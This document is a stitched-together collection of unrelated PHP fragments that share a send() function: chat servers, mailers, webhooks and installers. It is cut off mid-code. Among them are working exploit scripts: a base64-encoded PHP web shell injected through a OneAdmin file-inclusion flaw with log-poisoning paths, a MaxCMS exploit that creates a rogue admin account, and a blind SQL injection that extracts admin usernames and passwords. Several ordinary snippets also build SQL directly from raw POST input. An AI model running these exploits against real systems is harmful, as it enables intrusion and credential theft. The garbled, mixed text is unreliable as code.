function respond()
{
if (validate_fields()) {
build_header();
send();
}
}
function process($user, $msg)
{
$action = unwrap($msg);
say("< " . $action);
switch ($action) {
case "hello":
send($user->socket, "hello human");
break;
case "hi":
send($user->socket, "zup human");
break;
case "name":
send($user->socket, "my name is Multivac, silly I know");
break;
case "age":
send($user->socket, "I am older than time itself");
break;
case "date":
send($user->socket, "today is " . date("Y.m.d"));
break;
case "time":
send($user->socket, "server time is " . date("H:i:s"));
break;
case "thanks":
send($user->socket, "you're welcome");
break;
case "bye":
send($user->socket, "bye");
break;
default:
send($user->socket, $action . " not understood");
break;
}
}
function welcome($user, $nick, $pic)
{
$user->nick = $nick;
$user->pic = $pic;
$msg = getuserslist();
send($user, $msg);
broadcast("HELO|" . $nick . "|" . $pic, $nick);
}
public function store(Request $request)
{
Mail:
send('email.contact', $request->all(), function ($msj) {
$msj->subject('correo de contacto');
$msj->to('*****@*****.**');
Session::flash('mensaje', 'mesaje enviado correctamente');
return Redirect::to('/login');
});
}
function broadcast($sender, $message)
{
global $users;
for ($i = 0; $i < count($users); $i++) {
if ($sender != $users[$i]) {
send($users[$i]->socket, $message);
}
}
//for ($i = 0; $i < count($users); $i++)
}
/**
* 发消息
*/
function send_msg($postData, $paramsData)
{
$data = array();
if (!empty($paramsData)) {
$commData['ToUserName'] = $postData['FromUserName'];
$commData['FromUserName'] = $postData['ToUserName'];
$commData['CreateTime'] = time();
$data = array_merge($commData, $paramsData);
}
send($data);
}
function login($user, $pass)
{
global $user_info;
$data = explode("\r\n\r\n", send("/wiki/api.php", "localhost", array("action" => "login", "lgname" => $user, "lgpassword" => $pass, "format" => "php")));
$data = unserialize($data[1]);
if ($data['login']['result'] == "Success") {
$user_info['name'] = $user;
return true;
} else {
return false;
}
}
function confirm_notice($snt)
{
$msg = gen_total_msg($snt);
echo_msg($msg);
$confirm = ask_y_or_n("Are you sure to send the above message?");
if ($confirm) {
echo "Comment mail will be sent.\n\n";
send($msg);
} else {
echo "Comment mail is cancelled.\n\n";
}
}
function process($user_sent, $msg)
{
global $sockets, $users;
$ms = unwrap($msg);
$obj = json_decode($ms);
$action = $obj->msg;
say("< " . $action);
foreach ($users as &$user) {
if ($user != $user_sent) {
send($user->socket, $action);
}
}
}
function process_commits($commits, $project)
{
$delta = 0;
foreach ($commits as $refname => $commit) {
$delta++;
$use_index = count($commit) > 1;
$commit_hash = git_rev_parse($commit);
$commit_id = $use_index ? "{$refname} commit {$commit_hash}" : "{$refname} commit (#{$delta}) {$commit_hash}";
$raw_message = git_show($commit_hash, 'format:%cn%n%s');
$author = $raw_message[0];
$message = $raw_message[1];
send($commit, $author, $message, $project);
}
}
function jsonrpc_call($url, $method, $params, $extra_headers = null)
{
static $req_id = 1;
$req = array("jsonrpc" => '2.0', "id" => $req_id++, "method" => $method, "params" => $params);
$req = json_encode($req);
$res = send($url, $req, $extra_headers = $extra_headers);
#echo $res;
$res = json_decode($res, true);
if (!isset($res)) {
echo "error: not result\n";
return null;
} else {
if (!array_key_exists('result', $res) || !isset($res['result'])) {
print_r($res['error']);
return null;
} else {
return $res['result'];
}
}
return $res;
}
function reportAdmin($db, $users)
{
foreach ($users as $depe => $info) {
foreach ($info as $key => $value) {
${$key} = $value;
}
$asuntoMail = utf8_decode("Jefes sin correo electrónico.");
//$mailDestino = "*****@*****.**";
//$CC="*****@*****.**";
$mailDestino = ADMIN_EMAIL;
if ($usersWithoutMail) {
$usersWithoutMail = "<li>" . implode("</li><li>", $usersWithoutMail) . "</li>";
}
$mensaje = "Se informa que los siguientes jefes de dependencia no tienen correo electrónico ó éste es inconsistente.<br>\n<br>\n\tEn consecuencia no se les ha podido reportar las correspondientes novedades del sistema Orfeo, entre otros usuarios de sus dependencias que presentan el mismo problema: <br>\n<ul><li>{$nameBoss} jefe de la dependencia {$depeName} ({$depe})</li><ul>{$usersWithoutMail}</ul></ul>\n";
if (send($asuntoMail, $mensaje, $mailDestino, $CC)) {
$send["success"][$depe] = $info;
} else {
$send["error"][$depe] = $info;
}
}
return $send;
}
public function ReturnContent($content)
{
switch ($content) {
case "myplants":
case "createplant":
case "editplant":
case "testplant":
new ContentMessage($content) . send();
break;
case "nav":
if ($this->IsAdmin() != "false") {
new ContentMessage("adminnav") . send();
} else {
new ContentMessage($content) . send();
}
break;
case "debug":
if ($this->IsAdmin() != "false") {
new ContentMessage($content) . send();
}
break;
}
}
$shellcode = base64_decode("PD9waHAgaWYoJF9TRVJWRVJbSFRUUF9DTURdKXsgZWNobyBjbWR4cGxzdGFydC5zaGVsbF9leGVjKHN0cmlwc2xhc2hlcygkX1NFUlZFUltIVFRQX0NNRF0pKS5jbWR4cGxlbmQ7IH0gPz4=");
$req = "GET " . $path . "/oneadmin/adminfoot.php?path[docroot]={$shellcode} HTTP/1.1\r\n";
$req .= "Accept-Encoding: text/plain\r\n";
$req .= "Host: " . $host . "\r\n";
$req .= "Connection: Close\r\n\r\n";
send("{$host}", "{$req}");
$logs = array("../../../../../var/log/httpd/access_log", "../../../../../var/log/httpd/error_log", "../apache/logs/error.log", "../apache/logs/access.log", "../../apache/logs/error.log", "../../apache/logs/access.log", "../../../apache/logs/error.log", "../../../apache/logs/access.log", "../../../logs/access_log", "../../../logs/error_log", "../../../../apache/logs/error.log", "../../../../apache/logs/access.log", "../../../../../apache/logs/error.log", "../../../../../apache/logs/access.log", "../logs/error.log", "../logs/access.log", "../../logs/error.log", "../../logs/access.log", "../../../logs/error.log", "../../../logs/access.log", "../../../../logs/error.log", "../../../../logs/access.log", "../../../../../logs/error.log", "../../../../../logs/access.log", "../../../../../etc/httpd/logs/access_log", "../../../../../etc/httpd/logs/access.log", "../../../../../etc/httpd/logs/error_log", "../../../../../etc/httpd/logs/error.log", "../../../../../var/www/logs/access_log", "../../../../../var/www/logs/access.log", "../../../../../usr/local/apache/logs/access_log", "../../../../../usr/local/apache/logs/access.log", "../../../../../var/log/apache/access_log", "../../../../../var/log/apache/access.log", "../../../../../var/log/access_log", "../../../../../var/www/logs/error_log", "../../../../../var/www/logs/error.log", "../../../../../usr/local/apache/logs/error_log", "../../../../../usr/local/apache/logs/error.log", "../../../../../var/log/apache/error_log", "../../../../../var/log/apache/error.log", "../../../../../var/log/access_log", "../../../../../var/log/error_log");
$i = 0;
foreach ($logs as $value) {
$logs[$i++];
$req = "GET " . $path . "/oneadmin/adminfoot.php?path[docroot]={$logs[$i]}%00 HTTP/1.1\r\n";
$req .= "CMD: {$cmd}\r\n";
$req .= "Accept-Encoding: text/plain\r\n";
$req .= "Host: " . $host . "\r\n";
$req .= "Connection: Close\r\n\r\n";
send("{$host}", "{$req}");
print "Trying {$logs[$i]}..\n";
$adata = explode("cmdxplstart", $data);
$bdata = explode("cmdxplend", $adata[1]);
$cdata = $bdata[0];
if (eregi("cmdxplend", $data)) {
if ($cdata == NULL) {
die("\nExploit succeeded but blank command received..\n");
}
die("\nExploit Succeeded!\n\nCommand Resolution:\n{$cdata}\n");
}
}
}
die("Exploit Failed!\n");
?>
function doTest($socket)
{
while (true) {
console("[doTest] " . $socket);
$sendText = date('Y-m-d H:i:s');
if (!send($socket, $sendText)) {
echo "[doTest] Stop \n";
return;
}
sleep(1);
}
}
<?php
function send(swoole_client $cli)
{
$data = array('str1' => str_repeat('A', rand(1000, 9000)), 'str2' => str_repeat('B', rand(1000, 9000)), 'str3' => str_repeat('C', rand(1000, 9000)));
$data['int1'] = rand(100000, 999999);
$sendStr = serialize($data);
$sendData = pack('N', strlen($sendStr)) . $sendStr;
$cli->send($sendData);
echo "send length=" . strlen($sendData) . ", SerId={$data['int1']}\n";
}
$client = new swoole_client(SWOOLE_SOCK_TCP, SWOOLE_SOCK_ASYNC);
//异步非阻塞
$client->set(array('open_length_check' => 1, 'package_length_type' => 'N', 'package_length_offset' => 0, 'package_body_offset' => 4, 'package_max_length' => 2000000));
$client->on("connect", function (swoole_client $cli) {
send($cli);
});
$client->on("receive", function (swoole_client $cli, $data) {
$resp = unserialize(substr($data, 4));
echo "recv length=" . strlen($data) . ", SerId={$resp['int1']}\n" . str_repeat('-', 60) . "\n";
// sleep(1);
//usleep(200000);
//send($cli);
});
$client->on("error", function (swoole_client $cli) {
echo "error\n";
});
$client->on("close", function (swoole_client $cli) {
echo "Connection close\n";
});
$client->connect('127.0.0.1', 9501);
// Find any sessions that are about to start
$sessions = $app->db->queryAllRows("SELECT * FROM sessions WHERE start_time > NOW() AND start_time < (NOW() + INTERVAL 15 MINUTE) AND alert_flags & %d = 0", $ALERT_SOON);
if ($sessions) {
$op = 'Coming up next:';
$ids = array();
foreach ($sessions as $s) {
$tz = new \DateTimeZone($session['time_zone']);
$op .= "\n • `" . $s['start_time']->setTimeZone($tz)->format('H:i') . "` *" . $s['name'] . "*";
if ($s['room']) {
$op .= " (in " . $s['room'] . ")";
}
$ids[] = $s['id'];
}
if (count($ids) > 1) {
$op .= "\nSessions that are not in the main space have limited capacity, and will not admit more delegates when full, so please arrive in plenty of time for your session. This also avoids causing disruption to sessions that have already started.";
}
$app->db->query('UPDATE sessions SET alert_flags = alert_flags | %d WHERE id IN %d|list', $ALERT_SOON, $ids);
send($op);
}
function send($content)
{
global $app;
$http = new \HTTP\HTTPRequest($app->config->slack->incoming_webhook);
$http->setMethod('POST');
$http->setRequestBody(json_encode(array('channel' => '#' . $app->config->slack->announce_channel, 'text' => $content)));
try {
$http->send();
echo $content . "\n";
} catch (Exception $e) {
}
}
die("Could not connect: [{$errorcode}] {$errormsg} \n");
}
echo "Connection established \n";
function send($message)
{
global $sock;
if (!socket_send($sock, $message, strlen($message), 0)) {
$errorcode = socket_last_error();
$errormsg = socket_strerror($errorcode);
echo "Could not send data: [{$errorcode}] {$errormsg} \n";
}
}
function recieve()
{
global $sock;
if (socket_recv($sock, $buf, 2045, MSG_WAITALL) === FALSE) {
$errorcode = socket_last_error();
$errormsg = socket_strerror($errorcode);
echo "Could not receive data: [{$errorcode}] {$errormsg} \n";
}
echo $buff;
return $buf;
}
if (!is_resource($sock)) {
exit("connection fail: " . $errnum . " " . $errstr);
} else {
send("joueur\n");
send("add\n");
sleep(2);
send("remove\n");
}
$uname = $_SESSION['user'];
include "conn.php";
function send($to, $sub, $msg)
{
$con = mysql_connect("localhost", "root", "password");
if (!$con) {
echo mysql_error();
}
}
if (array_key_exists('send', $_POST)) {
$send = $_POST['send'];
$to = $_POST['to'];
$sub = $_POST['subject'];
$msg = $_POST['message'];
$tm = date('H:i:s');
send('$to', '$sub', '$msg');
$q1 = "insert into inbox values(\"{$to}\",\"{$sub}\",\"{$msg}\",\"{$uname}\",\"{$tm}\")";
$q2 = mysql_query("{$q1}");
if (!$q2) {
echo mysql_error();
}
$q3 = "insert into outbox values(\"{$uname}\",\"{$sub}\",\"{$msg}\",\"{$to}\",\"{$tm}\");";
$q4 = mysql_query("{$q3}");
if (!$q3) {
echo mysql_error();
}
if ($q4 && $q2) {
echo "<b>Your message is delivered Successfully</b>";
} else {
echo "<b>Unable to process your message</b>";
}
Usage: php ' . $argv[0] . ' host path
host: target server (ip/hostname)
path: path to maxcms
Example:
php ' . $argv[0] . ' localhost /maxcms2/
+---------------------------------------------------------------------------+
');
exit;
}
error_reporting(7);
ini_set('max_execution_time', 0);
$host = $argv[1];
$path = $argv[2];
$name = rand(1, 10000);
$cmd = 'm_username=securitylab' . $name . '&m_pwd=securitylab&m_pwd2=securitylab&m_level=0';
$resp = send($cmd);
if (!eregi('alert', $resp)) {
echo "[~]bad!,exploit failed";
exit;
}
print_r('
+---------------------------------------------------------------------------+
[+]cool,exploit seccuss
[+]you have add a new adminuser securitylab' . $name . '/securitylab
+---------------------------------------------------------------------------+
');
function send($cmd)
{
global $host, $path;
$message = "POST " . $path . "admin/admin_manager.asp?action=add HTTP/1.1\r\n";
$message .= "Accept: */*\r\n";
<td align="center">
<table align="center" class="hidden">
<tr>
<td>';
makebutton($lang_global['back'], 'javascript:window.history.back()', 130);
$output .= '
</td>
</tr>
</table>
</td>
</tr>
</table>
</center>';
}
$action = isset($_GET['action']) ? $_GET['action'] : NULL;
$lang_message = lang_message();
$lang_telnet = lang_telnet();
if ('send' === $action) {
send($sqlc);
} elseif ('result' === $action) {
result();
} elseif ('main' === $action) {
main();
} else {
check();
}
unset($action);
unset($action_permission);
unset($lang_telnet);
unset($lang_message);
require_once 'footer.php';
require_once "query/message.php";
$DOJSS = $_COOKIE['DOJSS'];
$name = safe($_POST['name']);
$pwd = safe($_POST['password']);
$user = checkDOJSS($DOJSS);
if (!checkName($name)) {
send(1, $err['invalidName']);
}
if ($user) {
if ($user->name == $name) {
send(2, $warning['sameMsg']);
}
if ($u = getUserByName($name)) {
if ($u->id != $user->id) {
send(1, $err['sameName']);
}
}
if (dc_decrypt($user->password, $key_pwd) != $pwd) {
send(1, $err['wrongPwd']);
}
$uid = $user->id;
mysql_query("UPDATE `users` SET \n\t\t\t`name` = '{$name}'\n\t\tWHERE `id` = {$uid} ");
if (mysql_affected_rows()) {
send(0, $tip['changedName'], "\$('#myName').html('{$name}');");
} else {
send(1, $err['notSaved']);
}
} else {
send(1, $err['wrongDOJSS']);
}
/**
* send foot-portion
*/
function sendFoot()
{
send('</body>');
send('</html>');
}
<?php
$page = "settings-game";
$page_title = "Games Settings";
$auth_name = 'manage_settings';
require 'inc.php';
if ($no_games && $_GET['t'] != 'add') {
send('settings-games.php?t=add');
}
if ($_GET['t'] == 'add') {
// if add game type page
$is_add = true;
$add_game_token = genFormToken('addgame');
} else {
// if edit current game settings
$is_add = false;
// We are using the game information that was pulled in setup.php
$game_token = genFormToken('gamesettings');
if ($_GET['w'] == 'game') {
set_warning('You have changed game/DB since the last page!');
}
}
require 'inc/header.php';
if ($is_add) {
?>
<a href="settings-games.php" class="float-left">« Go Back</a>
<br />
<form action="actions/settings-game.php" method="post">
$body .= 'Password: <b>' . $user_pw . "</b><br />";
$body .= 'If you have not already, please entirely remove the install folder from Echelon (/echelon/install/).<br />';
$body .= 'Thank you for downloading and installing Echelon, <br />';
$body .= 'The B3 Dev. Team';
$body .= '</body></html>';
$headers = "From: echelon@" . $_SERVER['HTTP_HOST'] . "\r\n";
$headers .= "Reply-To: " . $email . "\r\n";
$headers .= "MIME-Version: 1.0\r\n";
$headers .= "Content-Type: text/html; charset=ISO-8859-1\r\n";
$subject = "Echelon Admin User Setup";
// send email
if (!mail($email, $subject, $body, $headers)) {
sendback('There was a problem sending the user login information email.');
}
## Done ##
send('index.php?t=done');
// send to a thankyou done page that explains what next
}
// end install
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Echelon Install Package</title>
<link href="../css/style.css" rel="stylesheet" media="screen" type="text/css" />
<link href="style.css" rel="stylesheet" media="screen" type="text/css" />
</head>
$pageTitle = "Recupero credenziali";
} else {
$pageTitle = "Accedi";
}
$wait = true;
require_once 'templates/shared/header.php';
if (isset($recupero)) {
if (isset($_POST['email'])) {
$email = encode($_POST['email']);
do {
$number = rand(2, 1000000000);
} while ($dati['database']->count("persone", array("stato" => $number)) != 0);
if ($dati['database']->count("persone", array("AND" => array("email" => $email, "stato[!]" => 0))) != 0) {
$dati['database']->update("persone", array("stato" => $number), array("email" => $email));
send(decode($email), $dati['info']['sito'], "Recupero credenziali", '<p>È stato effettuata una richeista di recupero delle credenziali per il tuo account dell\'autogestione.</p>
<p>Clicca sul link seguente o copialo nella barra del browser per completare l\'operazione.</p>
<p><center><a href="http://itiseuganeo.altervista.org/recupero/' . $number . '">http://itiseuganeo.altervista.org/recupero/' . $number . '</a></center></p>', $dati['database']->get("persone", "nome", array("AND" => array("username" => $username, "email" => $email))));
salva();
}
}
echo '
<div class="jumbotron yellow">
<div class="container text-center">
<h1><i class="fa fa-key"></i> Recupero credenziali</h1>
<p>Dopo aver completato i campi richiesti riceverai una mail con la procedura necessaria.</p>
<p class="text-blue">Attenzione: disponibile solo per coloro che hanno effettuato l\'accesso almeno una volta.</p>
</div>
</div>
<div class="jumbotron">
<div class="container">
<p>Inserire le informazione che identificano l\'account:</p>
})->via('GET', 'POST');
$app->map('/verifica/:id', function ($id) use($dati, $app) {
$dati['database']->update('persone', array('verificata' => 1), array('verificata' => $id));
$app->redirect($app->urlFor('index'));
})->via('GET', 'POST');
if (isUserAutenticate()) {
$app->get('/profilo', function () use($dati, $app) {
$app->render('user.php', array('dati' => $dati));
});
$app->get('/check', function () use($dati, $app) {
$results = $dati['database']->select('persone', array('nome', 'email', 'verificata'), array('id' => $dati['user']));
if ($results != null) {
foreach ($results as $result) {
if ($result['verificata'] != 1) {
send(decode($result['email']), $dati['sito'], 'Verifica email', '<p>È necessario eseguire la verifica dell\'email inserita nel tuo account per il sito dell\'autogestione, al fine di assicurarci che siamo in grado di contattarti in caso di necessità.</p>
<p>Clicca sul link seguente o copialo nella barra del browser per completare l\'operazione.</p>
<p><center><a href=\'http://itiseuganeo.altervista.org/verifica/' . $result['verificata'] . '\'>http://itiseuganeo.altervista.org/verifica/' . $result['verificata'] . '<a></center></p>', $result['nome']);
}
}
}
finito('reinvia');
$app->redirect($app->urlFor('index'));
})->name('check');
$app->map('/modifica', function () use($dati, $app) {
$app->render('login/modifica.php', array('dati' => $dati));
$fatto = fatto();
if ($dati['first'] && $fatto) {
$app->redirect($app->urlFor('check'));
} elseif ($fatto) {
$app->redirect($app->urlFor('index'));
}
<?php
$auth_name = 'ban';
$b3_conn = true;
// this page needs to connect to the B3 database
require '../../inc.php';
if (!$_POST['ban-sub']) {
// if the form not is submitted
set_error('Please do not call that page directly, thank you.');
send('../../index.php');
}
## check that the sent form token is corret
if (!verifyFormToken('ban', $tokens)) {
// verify token
ifTokenBad('Add ban');
}
## Type of ban and get and set vars ##
$pb_ban = cleanvar($_POST['pb']);
if ($pb_ban == 'on') {
$is_pb_ban = true;
} else {
$is_pb_ban = false;
$duration_form = cleanvar($_POST['duration']);
$time = cleanvar($_POST['time']);
emptyInput($time, 'time frame');
emptyInput($duration_form, 'penalty duration');
}
$reason = cleanvar($_POST['reason']);
$client_id = cleanvar($_POST['cid']);
$pbid = cleanvar($_POST['c-pbid']);
$c_name = cleanvar($_POST['c-name']);
}
$password = '';
for ($i = 0; $i <= 6; $i++) {
if (rand(1, 2) == 1) {
$password .= $letters[rand(1, 40)];
} else {
$password .= rand(1, 9);
}
}
$row['user_pass'] = md5($password);
if (strtolower($_POST['user_email']) == strtolower($u['user_email']) && $_POST['user_login'] == $u['user_login']) {
$row = array();
unset($password);
$row['ID'] = $u['ID'];
}
$row['sdate'] = date('Y-m-d H:i:s');
$id = $model->insert($row);
$user = $model->getById($id);
require_once ROOT_DIR . 'mail_generator.php';
send($user['user_email'], 'Here are Your Next Steps', 'subscribe', $user, array('password' => $password));
$_SESSION['user_email'] = $_POST['user_email'];
$_SESSION['user_id'] = $id;
header('Location: challenge/success.php');
}
}
require_once ROOT_DIR . 'mobile_detect.php';
$detect = new mobile_detect();
if ($detect->isMobile() || $detect->isTablet()) {
$mobile = true;
}
require_once ROOT_DIR . 'templates/index.php';
$b = send('http://server', "3' and (select substr(username,{$i},1) from aradown_admin)='{$char}' # ");
if (eregi('<span class="on_img" align="center"></span>', $b) && $char == 'z') {
$i = 50;
break;
}
if (eregi('<span class="on_img" align="center"></span>', $b)) {
continue;
}
echo $char;
break;
}
}
echo "\n[*] Password : "******"3' and (select substr(password,{$i},1) from aradown_admin)='{$char}' # ");
if (eregi('<span class="on_img" align="center"></span>', $b)) {
continue;
}
echo $char;
break;
}
}
function send($target, $query)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "{$target}/ajax_like.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('id' => $query));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$r = curl_exec($ch);
